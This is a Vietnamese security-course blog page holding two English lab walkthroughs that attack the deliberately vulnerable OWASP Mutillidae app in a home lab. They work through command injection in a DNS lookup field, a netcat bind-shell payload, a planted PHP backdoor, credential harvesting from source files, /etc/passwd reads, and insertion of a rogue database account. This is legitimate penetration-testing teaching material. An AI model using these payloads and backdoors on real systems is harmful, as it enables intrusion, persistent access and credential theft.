baner

Cơ sở dữ liệu nâng cao

Cơ sở dữ liệu nâng cao, Advanced Database.

Khai phá dữ liệu

Khai phá dữ liệu.

An Toàn Thông Tin

An Toàn Thông Tin

Trí tuệ nhân tạo

Trí tuệ nhân tạo.

Bảo Mật Thông Tin

Bảo Mật Thông Tin

Thứ Ba, 31 tháng 12, 2013

Bài Hướng Dẫn Mutillidae : Lesson 3 - Command Injection Netcat Session

20:40:00  Unknown  Chưa có nhận xét nào

{ Command Injection Netcat Session }
Section 0. Background Information
  • What Mutillidae?
    • OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.
  • What is Command Injection?
    • Command Injection occurs when an attacker is able to run operating system commands or serverside scripts from the web application.  This vulnerability potential occurs when a web application allows you to commonly do a nslookup, whois, ping, traceroute and more from their webpage.  You can test for the vulnerability by using a technique called fuzzing, where a ";" or "|" or "||" or "&" or "&&" is append to the end of the expected input (eg., www.cnn.com) followed by a command (eg., cat /etc/passwd).
  • What is netcat?
    • Netcat is a computer networking service for reading from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable "back-end" device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities. Netcat is often referred to as a "Swiss-army knife for TCP/IP". Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.
  • Pre-Requisite Lab
    1. Mutillidae: Lesson 1: How to Install Mutillidae in Fedor
      • Note: Remote database access has been turned to provide an additional vulnerability.
    2. BackTrack: Lesson 1: Installing BackTrack 5 
      • Note: This is not absolutely necessary, but if you are a computer security student or professional, you should have a BackTrack VM.
  • Lab Notes
    • In this lab we will do the following:
      1. Execute netcat using the command injection/execution vulnerability.
      2. Create a netcat backdoor outside of the command injection vulnerability.
      3. Conduct PHP Reconnaissance
      4. Conduct Database Reconnaissance
      5. Add a user to the nowasp.accounts table.
  • Legal Disclaimer - không thực hành trên các mục tiêu mà bạn không có thẩm quyền
Section 1. Configure Fedora14 Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Program --> VMWare --> VMWare Player
  2. Edit Fedora Mutillidae Virtual Machine Settings
    • Instructions:
      1. Highlight fedora14
      2. Click Edit virtual machine settings
  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click the OK Button

Section 2. Login to Fedora14 - Mutillidae
  1. Start Fedora14 VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select Fedora14 - Mutillidae
      3. Play virtual machine
  2. Login to Fedora14 - Mutillidae
    • Instructions:
      1. Login: student
      2. Password: <whatever you set it to>.

Section 3. Open Console Terminal and Retrieve IP Address
  1. Start a Terminal Console
    • Instructions:
      1. Applications --> Terminal
  2. Switch user to root
    • Instructions:
      1. su - root
      2. <Whatever you set the root password to>
  3. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes (FYI):
      • As indicated below, my IP address is 192.168.1.111.
      • Please record your IP address.

Section 4. Configure BackTrack Virtual Machine Settings
  1. Edit the BackTrack5R1 VM
    • Instructions:
      1. Select BackTrack5R1 VM
      2. Click Edit virtual machine settings
  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

Section 5. Play and Login to BackTrack
  1. Play the BackTrack5R1 VM
    • Instructions:
      1. Click on the BackTrack5R1 VM
      2. Click on Play virtual machine
  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.
  3. Bring up the GNOME
    • Instructions:
      1. Type startx

Section 6. Open Console Terminal and Retrieve IP Address
  1. On BackTrack, Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window
  2. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • My IP address 192.168.1.109.
      • In your case, it will probably be different.
      • This is the machine that will be use to attack the victim machine (Metasploitable).
Section 7. Start Web Browser Session to Mutillidae
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
  2. Open Mutillidae
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. http://192.168.1.111/mutillidae

Section 8. Netcat Command Execution
  1. Go to DNS Lookup
    • Instructions:
      1. OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Reflected (First Order) --> DNS Lookup
     
  2. Execute Netcat  
    • Notes(FYI):
      • Below we are going to append NetCat to the basic nslookup test.  :)
    • Instructions:
      1. www.cnn.com;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
        • Make a FIFO named pipe.
        • Pipes allow separate processes to communicate without having been designed explicitly to work together.
        • This will allow two processes to connect to netcat.
        • nc -l 4444, tells netcat to listen and allow connections on port 4444.
      2. Click Lookup DNS
      3. Continue to next step
        • Note: No results will be displayed to this webpage, please continue to next step.
     
  3. Verifying Results
    • Note(FYI):
      1. Notice in the upper left tab, there is a connection pin-wheel that constantly spins.
      2. Notice in the lower left corner, the status bar displays the message transferring data.
      3. Both of these messages are a good signs that netcat is running and listening for a connection.
    • Instructions:
      1. Continue to next section.

Section 9. Connecting to Netcat
  1. Connect to Netcat
    • Notes(FYI):
      • Implement the following instructions on the BackTrack VM
      • Replace 192.168.1.111 with the Fedora(Mutillidae) IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. nc 192.168.1.111 4444
        • Use BackTrack to Connect to the Mutillidae Netcat session on port 4444
      2. hostname
        • This is server hostname that hosts DVWA.
      3. whoami
        • Print the effective UserID.
        • Ie., Who am I connected as.
  2. Directory and Username Reconnaissance
    • Notes (FYI):
      • We already know that we connected as the apache user, but we also want to know what is our current working directory.
      • Also, we want to know if we have the ability to create a file within the current working directory.   
    • Instructions:
      1. pwd
        • Print the current working directory
      2. uname -a
        • Print system information (eg., Operating System & Version, Kernel, etc).
      3. cat /etc/passwd > passwd.txt
        • Create a passwd.txt file located in /var/www/html/mutillidae
      4. ls -l $PWD/passwd.txt
        • List the passwd.txt file.

Section 10. Viewing /etc/passwd
  1. Open New FireFox Tab
    • Notes (FYI):
      • Perform the following instructions on BackTrack's Firefox.
    • Instructions:
      1. Click on the Green Plus to create a new tab
  2. View /etc/passwd
    • Notes (FYI):
      • Replace 192.168.1.111 with the Fedora (Mutillidae) IP Address obtained in (Section 3, Step 3).
      • It nice to be able to view the password file, but the real feat was to be able to create a file and view it on the apache webserver.  (Prepare for some black magic).
    • Instructions:
      1. Place the following link in the Address Bar.
        • http://192.168.1.111/mutillidae/passwd.txt

Section 11. Create PHP Backdoor
  1. Discover the Database Engine using the /etc/passwd file
    • Notes (FYI):
      • Perform the following instructions using your previous BackTrack Terminal Netcat session.
      • We now we can create a file on the Apache Webserver in the /var/www/html/mutillidae directory.
      • Let's create a php script that will serve as a netcat backdoor without having to execute netcat using the nslookup command execution.  
    • Instructions:
      1. echo "<?php system(\"mkfifo /tmp/pipe2;sh /tmp/pipe2 | nc -l 3333 > /tmp/pipe2\"); ?>" > nc_connect.php
      2. ls -l $PWD/nc_connect.php
      3. chmod 700 nc_connect.php
      4. ls -l $PWD/nc_connect.php
      5. cat nc_connect.php
  2. Execute nc_connect.php
    • Notes (FYI):
      • Perform the next steps in BackTrack's second Firefox tab.
      • Replace 192.168.1.111 with the Fedora (Mutillidae) IP Address obtain in (Section 3, Step 3).
      • Use the second Firefox tab that you previously viewed the /etc/passwd file with to execute the nc_connect.php script.  
    • Instructions:
      1. Place the following link in the Address Bar.
        • http://192.168.1.111/mutillidae/nc_connect.php
      2. Continue to Next Step
  3. On BackTrack, Start up a "another" terminal window
    • Instructions:
      1. Click on the Terminal Window
  4. Viewing your netcat sessions
    • Notes (FYI):
      • This terminal window will be used to connect to the nc_config.php netcat session.
      • Replace 192.168.1.111 with the Fedora (Mutillidae) IP Address obtain in (Section 3, Step 3).
    • Instructions:
      1. nc 192.168.1.111 3333
      2. whoami
      3. ps -eaf | egrep '(3333|4444)'

Section 10. PHP Script Interrogation
  1. List all php scripts
    • Notes (FYI):
      • Perform the next steps in the nc_config.php netcat terminal.
      • Our next step is to try to figure out if any of the php scripts located under /var/www/html/mutillidae contain a database username and password.
      • But, first, let's count all the php scripts and include files.
    • Instructions:
      1. pwd
        • This show the current working directory to be /var/www/html/mutillidae.
      2. find * -name "*.php" | wc -l
        • Count the number of php script located in the current working directory.
      3. find * -name "*.inc" | wc -l
        • Count the number of php include files located in the current working directory.
  2. List all php scripts
    • Notes (FYI):
      • Now we are going to search each include file (*.inc) for the string "password" AND the strings "db" OR "database".
    • Instructions:
      1. find * -name "*.inc" | xargs grep -i password | egrep -i '(db|database)'
        • find * -name "*.inc", find all files with the *.inc extension in the current working directory.
        • xargs, build and execute command lines from standard input
        • grep -i password, ignore case and search for the string "password".
        • egrep -i '(db|database)', ignore case and search for the strings "db" OR "database".
  3. Search php scripts for the string password
    • Notes (FYI):
      • Now we will search the 900+ php scripts for the string "password" AND the strings ("db" OR "database") AND the string "=".
      • I will use head -8 to show only the first 8 lines, but feel free to remove the "| head -8" to see all the results.
      • The name of the script that contains the database password is MySQLHandler.php.
    • Instructions:
      1. find * -name "*.php" | xargs grep -i password | egrep -i '(db|database)' | grep "=" | head -8
  4. Search MySQLHandler.php for authentication information
    • Notes (FYI):
      • Below I will search the MySQLHandler.php script for the strings (password OR username OR database) and the string "=".
      • Notice the username (root), password (samurai), and database (nowasp) is listed in the results.
    • Instructions:
      1. find * -name "MySQLHandler.php" | xargs egrep -i '(password|username|database)' | grep "=" | head -10

Section 11. Database Interrogation
  1. Basic Database Interrogation
    • Notes (FYI):
      • Perform the next steps in the nc_config.php netcat terminal.
      • The below command shows you how to execute database commands in the netcat session.
      • show databases, allows you to view all databases.
      • use nowasp; show tables, means use the nowasp database and show its's tables.
    • Instructions:
      1. echo "show databases;" | mysql -uroot -psamurai
      2. echo "use nowasp; show tables;" | mysql -uroot -psamurai
  2. Interrogate the accounts table
    • Notes (FYI):
      • The below command shows you how to view the column fields of the accounts tables.
      • In addition, you will run a basic select statement to view the contents of the accounts table.
    • Instructions:
      1. echo "use nowasp; desc accounts;" | mysql -uroot -psamurai
      2. echo "select * from nowasp.accounts;" | mysql -uroot -psamurai
  3. Create a new user in the accounts table
    • Notes (FYI):
      • The below command shows you how to create a new username using the MySQL insert command.
      • Pay attention to the last record of your select statement results.
    • Instructions:
      1. echo "insert into nowasp.accounts values (null,'hacker33','p4sSw0rd!','H4ck 4 fo0d','TRUE');" | mysql -uroot -psamurai
      2. echo "select * from nowasp.accounts;" | mysql -uroot -psamurai
Section 12. Proof of Lab
  1. Proof of Lab
    • Notes (FYI):
      • Perform the next steps in the nc_config.php netcat terminal
      • Use nc_config.php netcat session for the below directions.
    • Instructions:
      1. echo "select * from nowasp.accounts where username = 'hacker33';" | mysql -uroot -psamurai
      2. netstat -nao | egrep '(3333|4444)'
      3. date
      4. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions:
      1. Do a PrtScn
      2. Paste into a word document
      3. Upload to website www.antoanthongtin.edu.vn
Xem thêm...

Bài Hướng Dẫn Mutillidae : Lesson 2 - Command Injection Database Interrogation

20:35:00  Unknown  Chưa có nhận xét nào

{ Command Injection Database Interrogation }
Section 0. Background Information
  • What Mutillidae?
    • OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.
  • What is Command Injection?
    • Command Injection occurs when an attacker is able to run operating system commands or serverside scripts from the web application.  This vulnerability potential occurs when a web application allows you to commonly do a nslookup, whois, ping, traceroute and more from their webpage.  You can test for the vulnerability by using a technique called fuzzing, where a ";" or "|" or "||" or "&" or "&&" is append to the end of the expected input (eg., www.cnn.com) followed by a command (eg., cat /etc/passwd).
  • What is Fuzzing?
    • Fuzz testing or fuzzing is a software testing technique that involves providing invalid, unexpected, or random data to the inputs of a computer program. The program is then monitored for exceptions such as crashes, or failing built-in code assertions or for finding potential memory leaks. Fuzzing is commonly used to test for security problems in software or computer systems.
  • Pre-Requisite Lab
    1. Mutillidae: Lesson 1: How to Install Mutillidae in Fedora
      • Note: Remote database access has been turned to provide an additional vulnerability.
    2. BackTrack: Lesson 1: Installing BackTrack 5 
      • Note: This is not absolutely necessary, but if you are a computer security student or professional, you should have a BackTrack VM.
  • Lab Notes
    • In this lab we will do the following:
      1. Exploit a command injection/execution fuzzing vulnerability.
      2. Operating System Reconnaissance
      3. Application home directory Reconnaissance
      4. Database Reconnaissance
      5. Encoding PHP Script to view contents
      6. Remotely connecting to database
  • Legal Disclaimer  - không áp dụng các bài hướng dẫn trên hệ thống không có thẩm quyền
Section 1. Configure Fedora14 Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Program --> VMWare --> VMWare Player
  2. Edit Fedora Mutillidae Virtual Machine Settings
    • Instructions:
      1. Highlight fedora14
      2. Click Edit virtual machine settings
  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click the OK Button

Section 2. Login to Fedora14 - Mutillidae
  1. Start Fedora14 VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select Fedora14 - Mutillidae
      3. Play virtual machine
  2. Login to Fedora14 - Mutillidae
    • Instructions:
      1. Login: student
      2. Password: <whatever you set it to>.

Section 3. Open Console Terminal and Retrieve IP Address
  1. Start a Terminal Console
    • Instructions:
      1. Applications --> Terminal
  2. Switch user to root
    • Instructions:
      1. su - root
      2. <Whatever you set the root password to>
  3. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes (FYI):
      • As indicated below, my IP address is 192.168.1.111.
      • Please record your IP address.

Section 4. Configure BackTrack Virtual Machine Settings
  1. Edit the BackTrack5R1 VM
    • Instructions:
      1. Select BackTrack5R1 VM
      2. Click Edit virtual machine settings
  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

Section 5. Play and Login to BackTrack
  1. Play the BackTrack5R1 VM
    • Instructions:
      1. Click on the BackTrack5R1 VM
      2. Click on Play virtual machine
  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.
  3. Bring up the GNOME
    • Instructions:
      1. Type startx

Section 6. Open Console Terminal and Retrieve IP Address
  1. On BackTrack, Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window
  2. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • My IP address 192.168.1.109.
      • In your case, it will probably be different.
      • This is the machine that will be use to attack the victim machine (Metasploitable).
Section 7. Start Web Browser Session to Mutillidae
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
  2. Open Mutillidae
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. http://192.168.1.111/mutillidae

Section 8. Basic Command Execution Testing
  1. Go to DNS Lookup
    • Instructions:
      1. OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Reflected (First Order) --> DNS Lookup
  2. Test DNS Lookup
    • Notes (FYI):
      • DNS Lookup on the surface is design to do just that,,, provide a DNS Lookup.
    • Instructions:
      1. Hostname/IP: www.cnn.com
      2. Click the Lookup DNS button
      3. View your Results
  3. Test DNS Lookup Vulnerability
    • Notes (FYI):
      • Now we will test a security vulnerable that will let us append a Unix/Linux command to the end of the hostname we are looking up.
      • The procedure of appending a ";" after what the application expects, is called command fuzzing.
      • Below you will run the "uname -a" command  
    • Instructions:
      1. Hostname/IP: www.cnn.com; uname -a
      2. Click the Lookup DNS button
      3. View your Results
  4. Perform Reconnaissance
    • Notes (FYI):
      • Don't you think it would be nice to know where there particular web page application is running from?
      • Now we are going to run the "pwd" to show us the current working directory.
      • Also, notice in the Address Bar that the application is called dns-lookup.php  
    • Instructions:
      1. Hostname/IP: www.cnn.com; pwd
      2. Click the Lookup DNS button
      3. View your Results
      4. Notice that dns-lookup.php is the vulnerable program.
  5. Interrogate the dns-lookup.php application
    • Notes (FYI):
      • Just for grins, let's see if we can find the line of code where PHP is executing a system call.
      • I will use the xargs command to search, using egrep, for the following strings: exec OR system OR virtual.  
    • Instructions:
      1. Hostname/IP:
        • www.cnn.com; find /var/www/html/mutillidae -name "dns-lookup.php" | xargs egrep '(exec|system|virtual)'
      2. Click the Lookup DNS button
      3. View your Results
        • Notice there is a function called shell_exec(), that is actually executing the Linux command "nslookup".

Section 9. Database Reconnaissance
  1. Discover the Database Engine using the /etc/passwd file
    • Notes (FYI):
      • Let's search the /etc/passwd file for the following strings: postgres, sql, db2 and ora.  
    • Instructions:
      1. Hostname/IP:
        • www.cnn.com; cat /etc/passwd | egrep -i '(postgres|sql|db2|ora)'
      2. Click the Lookup DNS button
      3. View your Results
        • MySQL is the database engine
  2. Discover the Database Engine using the "ps" command
    • Notes (FYI):
      • Let's use the "ps" command to search for the following process strings: postgres, sql, db2 and ora.  
    • Instructions:
      1. Hostname/IP:
        • www.cnn.com; ps -eaf | egrep -i '(postgres|sql|db2|ora)'
      2. Click the Lookup DNS button
      3. View your Results
        • The mysqld (daemon) is running.

Section 10. Database Interrogation
  1. List all php scripts
    • Notes (FYI):
      • Our next step is to try to figure out if any of the php scripts located under /var/www/html/mutillidae contain a database username and password.
      • But, first list all the php scripts.
    • Instructions:
      1. Hostname/IP:
        • www.cnn.com; find /var/www/html/mutillidae -name "*.php"
      2. Click the Lookup DNS button
      3. View your Results
        • There is over 900+ php scripts.
  2. Search php scripts for the string password
    • Notes (FYI):
      • Now we will search the 900+ php scripts for the string "password" and "=".
    • Instructions:
      1. Hostname/IP:
        • www.cnn.com; find /var/www/html/mutillidae -name "*.php" | xargs grep -i "password" | grep "="
      2. Click the Lookup DNS button
      3. View your Results (Continue to next step).
  3. Obtain password from search results
    • Notes (FYI):
      • Now you have to look closely to see the string password and the actual password "samurai".
    • Instructions:
      1. Notice that the MySQLHandler.php contains the following string:
        • $mMySQLDatabasePassword = "samurai";
  4. Search MySQLHandler.php for the strings user OR login
    • Notes (FYI):
      • We now know that MySQLHandler.php contains the database password.
      • The only thing left it to obtain the database username for the password samarai.
    • Instructions:
      1. Hostname/IP:
        • www.cnn.com; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs egrep -i '(user|login)' | grep "="
      2. Click the Lookup DNS button
      3. View your Results (Continue to next step).
  5. Obtain username from search results
    • Instructions:
      1. Notice that the MySQLHandler.php contains the following string:
        • $mMySQLDatabaseUsername = "root";
      2. Notice the MySQL connection method.
        • mMySQLConnection = new mysqli($HOSTNAME, $USERNAME, $SAMURAI_WTF_PASSWORD);
  6. Display MySQLHandler.php
    • Notes (FYI):
      • I guess I could have showed you this first, but good things come to those that wait.
      • It is possible to display the contents of the MySQLHandler.php program, by encoding the "<?php" and "?>" tags.  These tags tell apache to execute a php script.  To get around this problem and just display the text of the program, we change "<" to "&#60;" and ">" to "&#62;".
    • Instructions:
      1. Hostname/IP:
        • www.cnn.com; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs cat | sed 's/</\&#60;/g' | sed 's/>/\&#62;/g'
      2. Click the Lookup DNS button
      3. View your Results (Continue to next step).
  7. Viewing the Code
    • Notes (FYI):
      • Kind of scary,,, right?
      • Typically, you should never put authentication information into a program that accesses a database on the web.
    • Instructions:
      1. Database Username
        • static public $mMySQLDatabaseUsername = "root";
      2. Database Password
        • static public $mMySQLDatabasePassword = "samurai";
      3. Database Name
        • static public $mMySQLDatabaseName = "nowasp";
Section 11. Connect Remotely to MySQL
  1. On BackTrack, Open a Terminal
    • Instructions:
      1. Click on the Terminal Icon
  2. Connect Remotely to the Mutillidae Database
    • Notes (FYI):
      • Replace 192.168.1.111 with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. mysql -h 192.168.1.111 -uroot -psamurai
      2. show databases;
      3. use nowasp;
  3. Table Navigation
    • Notes (FYI):
      • Basically, we are looking for a table that contains username and password information.
      • In this case, the account table contain the authentication information.
    • Instructions:
      1. show tables;
      2. desc accounts;
  4. Display Account Table Records
    • Instructions:
      1. select * from accounts;
      2. quit;
Section 12. Proof of Lab
  1. Proof of Lab
    • Notes (FYI):
      • Replace 192.168.1.111 with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. cd
      2. mysql -h 192.168.1.111 -uroot -psamurai -e "select * from nowasp.accounts" > account.txt
      3. ls -l account.txt
      4. date
      5. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions:
      1. Do a PrtScn
      2. Paste into a word document
      3. Upload to website www.antoanthongtin.edu.vn
Xem thêm...